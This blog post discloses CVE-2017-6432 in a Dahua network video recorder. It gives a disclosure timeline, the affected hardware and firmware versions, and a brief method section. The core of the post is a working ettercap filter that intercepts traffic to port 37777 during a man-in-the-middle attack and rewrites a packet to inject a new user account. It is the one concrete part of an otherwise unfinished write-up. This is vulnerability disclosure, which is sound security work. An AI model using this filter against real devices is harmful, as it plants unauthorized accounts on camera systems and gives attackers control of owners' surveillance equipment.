---
layout: post
title:  "Dahua NVR - CVE-2017-6432"
date:   2017-03-09 21:00:00 +1100
categories: exploit dahua
---

### Introduction

After discovering the Exposures identified here [https://nullku7.github.io/stuff/exposure/dahua/2017/02/24/dahua-nvr.html](https://nullku7.github.io/stuff/exposure/dahua/2017/02/24/dahua-nvr.html)
I decided to try to inject a new user into the system by modifying packets in the TCP Stream

#### Disclosure Timeline
- 2017-02-24: Vulnerability Discovered
- 2017-03-02: Proof of Concept Written
- 2017-03-02: Dahua Contacted with plan to disclose on March 9th unless they wished otherwise.
- 2017-03-07: Dahua Responded with timeline to fix CVE-2017-6341, CVE-2017-6342, CVE-2017-6343
- 2017-03-07: Requested response for this: CVE-2017-6432 again
- 2017-03-09: Disclosure

### The Hardware

- NVR Model: DHI-HCVR7216A-S3
- NVR Firmware: 3.210.0001.10 build: 2016-6-6
- Camera Firmware: 2.400.0000.28.R build 2016-3-29
- SmartPSS Software (v 1.16.1 Build Date 2017-01-19)
- gDSS Software for Android

### The method

I will be filling in all the details tomorrow.  If your here now, your too early.  Come back later.

In short.
MitM + ettercap Filter = pwn


ettercap filter
```
if (ip.proto == TCP && tcp.dst == 37777 && DATA.data + 0 == "\xa4" && DATA.data + 8 == "\x1a" ){
    msg("Found One");
    log(DATA.data, "/tmp/data.l");
    replace("\xa4\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", "\xa6\x00\x00\x00\x11\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000:null:ku7:1:1::1");
    log(DATA.data, "/tmp/data.l");
    msg("Done");
}
```
![img]({{ site.github.url }}/images/Screen Shot 2017-03-02 at 12.51.14 am.png){:class="img-responsive"}
![img]({{ site.github.url }}/images/Screen Shot 2017-03-02 at 12.52.38 am.png){:class="img-responsive"}
